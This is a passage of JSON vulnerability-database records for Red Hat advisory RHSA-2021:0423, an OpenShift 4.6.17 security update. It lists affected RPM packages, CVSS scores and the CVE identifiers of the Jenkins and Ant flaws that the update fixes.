{"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2021", "ORACLE:CPUJUL2020", "ORACLE:CPUJAN2021", "ORACLE:CPUOCT2020"]}], "modified": "2021-02-17T20:31:14", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-02-17T20:31:14", "rev": 2}}, "objectVersion": "1.5", "affectedPackage": [{"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageName": "openshift-kuryr-cni", "packageVersion": "4.6.0-202102031810.p0.git.2225.a3ab872.el8", "packageFilename": "openshift-kuryr-cni-4.6.0-202102031810.p0.git.2225.a3ab872.el8.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageName": "runc-debuginfo", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-debuginfo-1.0.0-82.rhaos4.6.git086e841.el8.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "openshift-ansible", "packageVersion": "4.6.0-202102031649.p0.git.0.bf90f86.el7", "packageFilename": "openshift-ansible-4.6.0-202102031649.p0.git.0.bf90f86.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageName": "jenkins", "packageVersion": "2.263.3.1612434510-1.el8", "packageFilename": "jenkins-2.263.3.1612434510-1.el8.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageName": "runc-debugsource", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-debugsource-1.0.0-82.rhaos4.6.git086e841.el8.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageName": "runc", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-1.0.0-82.rhaos4.6.git086e841.el8.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageName": "openshift-clients", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el8", "packageFilename": "openshift-clients-4.6.0-202102050644.p0.git.3831.1c61c6b.el8.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-ansible", "packageVersion": "4.6.0-202102031649.p0.git.0.bf90f86.el7", "packageFilename": "openshift-ansible-4.6.0-202102031649.p0.git.0.bf90f86.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageName": "openshift-hyperkube", "packageVersion": "4.6.0-202102050212.p0.git.94265.716fcf8.el8", "packageFilename": "openshift-hyperkube-4.6.0-202102050212.p0.git.94265.716fcf8.el8.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageName": "openshift-clients", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el8", "packageFilename": "openshift-clients-4.6.0-202102050644.p0.git.3831.1c61c6b.el8.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "runc", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el7", "packageFilename": "runc-1.0.0-82.rhaos4.6.git086e841.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "openshift", "packageVersion": "4.6.0-202102050212.p0.git.94265.716fcf8.el7", "packageFilename": "openshift-4.6.0-202102050212.p0.git.94265.716fcf8.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageName": "openshift", "packageVersion": "4.6.0-202102050212.p0.git.94265.716fcf8.el8", "packageFilename": "openshift-4.6.0-202102050212.p0.git.94265.716fcf8.el8.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageName": "runc", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-1.0.0-82.rhaos4.6.git086e841.el8.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageName": "python3-rsa", "packageVersion": "4.7-1.el8", "packageFilename": "python3-rsa-4.7-1.el8.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageName": "openshift-kuryr-controller", "packageVersion": "4.6.0-202102031810.p0.git.2225.a3ab872.el8", "packageFilename": "openshift-kuryr-controller-4.6.0-202102031810.p0.git.2225.a3ab872.el8.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageName": "runc-debuginfo", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-debuginfo-1.0.0-82.rhaos4.6.git086e841.el8.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "openshift-clients", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el7", "packageFilename": "openshift-clients-4.6.0-202102050644.p0.git.3831.1c61c6b.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "openshift-clients", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el7", "packageFilename": "openshift-clients-4.6.0-202102050644.p0.git.3831.1c61c6b.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageName": "jenkins-2-plugins", "packageVersion": "4.6.1612257979-1.el8", "packageFilename": "jenkins-2-plugins-4.6.1612257979-1.el8.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "runc-debuginfo", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el7", "packageFilename": "runc-debuginfo-1.0.0-82.rhaos4.6.git086e841.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageName": "atomic-openshift-service-idler", "packageVersion": "4.6.0-202102031810.p0.git.15.dcab90a.el8", "packageFilename": "atomic-openshift-service-idler-4.6.0-202102031810.p0.git.15.dcab90a.el8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "openshift-clients-redistributable", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el7", "packageFilename": "openshift-clients-redistributable-4.6.0-202102050644.p0.git.3831.1c61c6b.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageName": "openshift-hyperkube", "packageVersion": "4.6.0-202102050212.p0.git.94265.716fcf8.el8", "packageFilename": "openshift-hyperkube-4.6.0-202102050212.p0.git.94265.716fcf8.el8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-ansible-test", "packageVersion": "4.6.0-202102031649.p0.git.0.bf90f86.el7", "packageFilename": "openshift-ansible-test-4.6.0-202102031649.p0.git.0.bf90f86.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageName": "openshift-kuryr-common", "packageVersion": "4.6.0-202102031810.p0.git.2225.a3ab872.el8", "packageFilename": "openshift-kuryr-common-4.6.0-202102031810.p0.git.2225.a3ab872.el8.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageName": "runc-debuginfo", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-debuginfo-1.0.0-82.rhaos4.6.git086e841.el8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageName": "python-rsa", "packageVersion": "4.7-1.el8", "packageFilename": "python-rsa-4.7-1.el8.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageName": "atomic-openshift-service-idler", "packageVersion": "4.6.0-202102031810.p0.git.15.dcab90a.el8", "packageFilename": "atomic-openshift-service-idler-4.6.0-202102031810.p0.git.15.dcab90a.el8.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "openshift-hyperkube", "packageVersion": "4.6.0-202102050212.p0.git.94265.716fcf8.el7", "packageFilename": "openshift-hyperkube-4.6.0-202102050212.p0.git.94265.716fcf8.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageName": "openshift-clients", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el8", "packageFilename": "openshift-clients-4.6.0-202102050644.p0.git.3831.1c61c6b.el8.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageName": "python3-kuryr-kubernetes", "packageVersion": "4.6.0-202102031810.p0.git.2225.a3ab872.el8", "packageFilename": "python3-kuryr-kubernetes-4.6.0-202102031810.p0.git.2225.a3ab872.el8.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "cri-o", "packageVersion": "1.19.1-7.rhaos4.6.git6377f68.el7", "packageFilename": "cri-o-1.19.1-7.rhaos4.6.git6377f68.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageName": "runc", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-1.0.0-82.rhaos4.6.git086e841.el8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageName": "jenkins-2-plugins", "packageVersion": "4.6.1612257979-1.el8", "packageFilename": "jenkins-2-plugins-4.6.1612257979-1.el8.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageName": "runc-debugsource", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-debugsource-1.0.0-82.rhaos4.6.git086e841.el8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageName": "atomic-openshift-service-idler", "packageVersion": "4.6.0-202102031810.p0.git.15.dcab90a.el8", "packageFilename": "atomic-openshift-service-idler-4.6.0-202102031810.p0.git.15.dcab90a.el8.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "cri-o-debuginfo", "packageVersion": "1.19.1-7.rhaos4.6.git6377f68.el7", "packageFilename": "cri-o-debuginfo-1.19.1-7.rhaos4.6.git6377f68.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageName": "openshift-clients", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el8", "packageFilename": "openshift-clients-4.6.0-202102050644.p0.git.3831.1c61c6b.el8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageName": "openshift-hyperkube", "packageVersion": "4.6.0-202102050212.p0.git.94265.716fcf8.el8", "packageFilename": "openshift-hyperkube-4.6.0-202102050212.p0.git.94265.716fcf8.el8.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageName": "openshift-kuryr", "packageVersion": "4.6.0-202102031810.p0.git.2225.a3ab872.el8", "packageFilename": "openshift-kuryr-4.6.0-202102031810.p0.git.2225.a3ab872.el8.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageName": "jenkins", "packageVersion": "2.263.3.1612434510-1.el8", "packageFilename": "jenkins-2.263.3.1612434510-1.el8.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageName": "openshift-clients-redistributable", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el8", "packageFilename": "openshift-clients-redistributable-4.6.0-202102050644.p0.git.3831.1c61c6b.el8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "runc", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el7", "packageFilename": "runc-1.0.0-82.rhaos4.6.git086e841.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageName": "atomic-openshift-service-idler", "packageVersion": "4.6.0-202102031810.p0.git.15.dcab90a.el8", "packageFilename": "atomic-openshift-service-idler-4.6.0-202102031810.p0.git.15.dcab90a.el8.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageName": "runc", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-1.0.0-82.rhaos4.6.git086e841.el8.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "cri-o", "packageVersion": "1.19.1-7.rhaos4.6.git6377f68.el7", "packageFilename": "cri-o-1.19.1-7.rhaos4.6.git6377f68.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageName": "runc-debugsource", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-debugsource-1.0.0-82.rhaos4.6.git086e841.el8.s390x.rpm", "operator": "lt"}], "vendorCvss": {}}, "lastseen": "2021-02-17T20:31:14", "differentElements": ["cvss2", "cvss3"], "edition": 1}, {"bulletin": {"id": "RHSA-2021:0423", "hash": "84fb4285efc34f03ac7027a9e1635309", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2021:0423) Important: OpenShift Container Platform 4.6.17 security and packages update", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nThis advisory contains the RPM packages for Red Hat OpenShift Container\nPlatform 4.6.17. See the following advisory for the container images for\nthis release:\n\nhttps://access.redhat.com/errata/RHBA-2021:0424\n\nSecurity Fix(es):\n\n* jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n* jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n* jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n* jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n* jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n* jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n* ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n* ant: insecure temporary file (CVE-2020-11979)\n\n* jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n* jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n* jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n* jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\n* jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "published": "2021-02-17T23:52:18", "modified": "2021-02-17T23:58:25", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 6.8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.0, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.1, "impactScore": 5.9}, "href": "https://access.redhat.com/errata/RHSA-2021:0423", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2020-11979", "CVE-2020-1945", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21604", "CVE-2021-21605", "CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21609", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21615"], "immutableFields": [], "lastseen": "2021-07-28T14:35:19", "history": [], "viewCount": 57, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["FEDORA_2020-2640AA4E19.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "JENKINS_2_274.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL", "REDHAT-RHSA-2021-0429.NASL", "REDHAT-RHSA-2021-0423.NASL", "GENTOO_GLSA-202011-18.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "JENKINS_2_276.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL"]}, {"type": "redhat", "idList": ["RHSA-2020:2618", "RHSA-2020:4961", "RHSA-2021:0719", "RHSA-2021:0637", "RHSA-2021:0429", "RHSA-2020:4960"]}, {"type": "archlinux", "idList": ["ASA-202005-15", "ASA-202101-41", "ASA-202012-5"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-21607", "RH:CVE-2021-21608", "RH:CVE-2021-21604", "RH:CVE-2020-11979", "RH:CVE-2021-21611", "RH:CVE-2021-21610", "RH:CVE-2021-21602", "RH:CVE-2021-21615", "RH:CVE-2021-21609", "RH:CVE-2021-21606"]}, {"type": "cve", "idList": ["CVE-2021-21609", "CVE-2021-21603", "CVE-2021-21604", "CVE-2021-21615", "CVE-2021-21602", "CVE-2021-21607", "CVE-2021-21611", "CVE-2021-21610", "CVE-2021-21606", "CVE-2021-21608"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-11979", "UB:CVE-2020-1945"]}, {"type": "gentoo", "idList": ["GLSA-202007-34", "GLSA-202011-18"]}, {"type": "fedora", "idList": ["FEDORA:2D51F60C28B2", "FEDORA:52396606732B", "FEDORA:88EAA30905CF", "FEDORA:6869030D3139", "FEDORA:146FE30DD5E7"]}, {"type": "github", "idList": ["GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454", "OPENVAS:1361412562310877930"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2020", "ORACLE:CPUJUL2021", "ORACLE:CPUAPR2021", "ORACLE:CPUJAN2021", "ORACLE:CPUOCT2020"]}], "modified": "2021-07-28T14:35:19", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-07-28T14:35:19", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "4.6.0-202102050212.p0.git.94265.716fcf8.el8", "packageFilename": "openshift-4.6.0-202102050212.p0.git.94265.716fcf8.el8.src.rpm", "operator": "lt", "packageName": "openshift"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageVersion": "4.6.1612257979-1.el8", "packageFilename": "jenkins-2-plugins-4.6.1612257979-1.el8.noarch.rpm", "operator": "lt", "packageName": "jenkins-2-plugins"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-debugsource-1.0.0-82.rhaos4.6.git086e841.el8.x86_64.rpm", "operator": "lt", "packageName": "runc-debugsource"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "4.6.0-202102031810.p0.git.15.dcab90a.el8", "packageFilename": "atomic-openshift-service-idler-4.6.0-202102031810.p0.git.15.dcab90a.el8.ppc64le.rpm", "operator": "lt", "packageName": "atomic-openshift-service-idler"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "4.7-1.el8", "packageFilename": "python-rsa-4.7-1.el8.src.rpm", "operator": "lt", "packageName": "python-rsa"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el8", "packageFilename": "openshift-clients-4.6.0-202102050644.p0.git.3831.1c61c6b.el8.s390x.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "1.19.1-7.rhaos4.6.git6377f68.el7", "packageFilename": "cri-o-1.19.1-7.rhaos4.6.git6377f68.el7.x86_64.rpm", "operator": "lt", "packageName": "cri-o"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el7", "packageFilename": "openshift-clients-4.6.0-202102050644.p0.git.3831.1c61c6b.el7.src.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "4.6.0-202102031810.p0.git.15.dcab90a.el8", "packageFilename": "atomic-openshift-service-idler-4.6.0-202102031810.p0.git.15.dcab90a.el8.src.rpm", "operator": "lt", "packageName": "atomic-openshift-service-idler"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageVersion": "4.6.0-202102031810.p0.git.2225.a3ab872.el8", "packageFilename": "openshift-kuryr-controller-4.6.0-202102031810.p0.git.2225.a3ab872.el8.noarch.rpm", "operator": "lt", "packageName": "openshift-kuryr-controller"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageVersion": "2.263.3.1612434510-1.el8", "packageFilename": "jenkins-2.263.3.1612434510-1.el8.noarch.rpm", "operator": "lt", "packageName": "jenkins"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el7", "packageFilename": "runc-debuginfo-1.0.0-82.rhaos4.6.git086e841.el7.x86_64.rpm", "operator": "lt", "packageName": "runc-debuginfo"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "4.6.0-202102031649.p0.git.0.bf90f86.el7", "packageFilename": "openshift-ansible-4.6.0-202102031649.p0.git.0.bf90f86.el7.src.rpm", "operator": "lt", "packageName": "openshift-ansible"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "4.6.0-202102050212.p0.git.94265.716fcf8.el8", "packageFilename": "openshift-hyperkube-4.6.0-202102050212.p0.git.94265.716fcf8.el8.ppc64le.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el7", "packageFilename": "openshift-clients-4.6.0-202102050644.p0.git.3831.1c61c6b.el7.x86_64.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageVersion": "4.6.0-202102031810.p0.git.2225.a3ab872.el8", "packageFilename": "openshift-kuryr-cni-4.6.0-202102031810.p0.git.2225.a3ab872.el8.noarch.rpm", "operator": "lt", "packageName": "openshift-kuryr-cni"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-debugsource-1.0.0-82.rhaos4.6.git086e841.el8.ppc64le.rpm", "operator": "lt", "packageName": "runc-debugsource"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el8", "packageFilename": "openshift-clients-4.6.0-202102050644.p0.git.3831.1c61c6b.el8.x86_64.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el7", "packageFilename": "runc-1.0.0-82.rhaos4.6.git086e841.el7.src.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "4.6.0-202102050212.p0.git.94265.716fcf8.el8", "packageFilename": "openshift-hyperkube-4.6.0-202102050212.p0.git.94265.716fcf8.el8.s390x.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-debugsource-1.0.0-82.rhaos4.6.git086e841.el8.s390x.rpm", "operator": "lt", "packageName": "runc-debugsource"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "4.6.0-202102050212.p0.git.94265.716fcf8.el7", "packageFilename": "openshift-hyperkube-4.6.0-202102050212.p0.git.94265.716fcf8.el7.x86_64.rpm", "operator": "lt", "packageName": "openshift-hyperkube"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", "packageVersion": "4.6.0-202102031810.p0.git.15.dcab90a.el8", "packageFilename": "atomic-openshift-service-idler-4.6.0-202102031810.p0.git.15.dcab90a.el8.s390x.rpm", "operator": "lt", "packageName": "atomic-openshift-service-idler"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "4.6.0-202102050212.p0.git.94265.716fcf8.el7", "packageFilename": "openshift-4.6.0-202102050212.p0.git.94265.716fcf8.el7.src.rpm", "operator": "lt", "packageName": "openshift"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-1.0.0-82.rhaos4.6.git086e841.el8.src.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el8", "packageFilename": "openshift-clients-redistributable-4.6.0-202102050644.p0.git.3831.1c61c6b.el8.x86_64.rpm", "operator": "lt", "packageName": "openshift-clients-redistributable"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-debuginfo-1.0.0-82.rhaos4.6.git086e841.el8.ppc64le.rpm", "operator": "lt", "packageName": "runc-debuginfo"}, {"OS": "RedHat", "OSVersion": "8", "arch": "ppc64le", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el8", "packageFilename": "openshift-clients-4.6.0-202102050644.p0.git.3831.1c61c6b.el8.ppc64le.rpm", "operator": "lt", "packageName": "openshift-clients"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "4.6.0-202102031810.p0.git.15.dcab90a.el8", "packageFilename": "atomic-openshift-service-idler-4.6.0-202102031810.p0.git.15.dcab90a.el8.x86_64.rpm", "operator": "lt", "packageName": "atomic-openshift-service-idler"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageVersion": "4.6.0-202102031810.p0.git.2225.a3ab872.el8", "packageFilename": "python3-kuryr-kubernetes-4.6.0-202102031810.p0.git.2225.a3ab872.el8.noarch.rpm", "operator": "lt", "packageName": "python3-kuryr-kubernetes"}, {"OS": "RedHat", "OSVersion": "8", "arch": "x86_64", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el8", "packageFilename": "runc-1.0.0-82.rhaos4.6.git086e841.el8.x86_64.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "1.0.0-82.rhaos4.6.git086e841.el7", "packageFilename": "runc-1.0.0-82.rhaos4.6.git086e841.el7.x86_64.rpm", "operator": "lt", "packageName": "runc"}, {"OS": "RedHat", "OSVersion": "8", "arch": "noarch", "packageVersion": "4.7-1.el8", "packageFilename": "python3-rsa-4.7-1.el8.noarch.rpm", "operator": "lt", "packageName": "python3-rsa"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "4.6.0-202102031649.p0.git.0.bf90f86.el7", "packageFilename": "openshift-ansible-test-4.6.0-202102031649.p0.git.0.bf90f86.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-ansible-test"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageVersion": "4.6.0-202102050644.p0.git.3831.1c61c6b.el7", "packageFilename": "openshift-clients-redistributable-4.6.0-202102050644.p0.git.3831.1c61c6b.el7.x86_64.rpm", "operator": "lt", "packageName": "openshift-clients-redistributable"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageVersion": "4.6.0-202102031649.p0.git.0.bf90f86.el7", "packageFilename": "openshift-ansible-4.6.0-202102031649.p0.git.0.bf90f86.el7.noarch.rpm", "operator": "lt", "packageName": "openshift-ansible"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageVersion": "1.19.1-7.rhaos4.6.git6377f68.el7", "packageFilename": "cri-o-1.19.1-7.rhaos4.6.git6377f68.el7.src.rpm", "operator": "lt", "packageName": "cri-o"}, {"OS": "RedHat", "OSVersion": "8", "arch": "src", "packageVersion": "4.6.0-202102031810.p0.git.2225.a3ab872.el8", "packageFilename": "openshift-kuryr-4.6.0-202102031810.p0.git.2225.a3ab872.el8.src.rpm", "operator": "lt", "packageName": "openshift-kuryr"}, {"OS": "RedHat", "OSVersion": "8", "arch": "s390x", 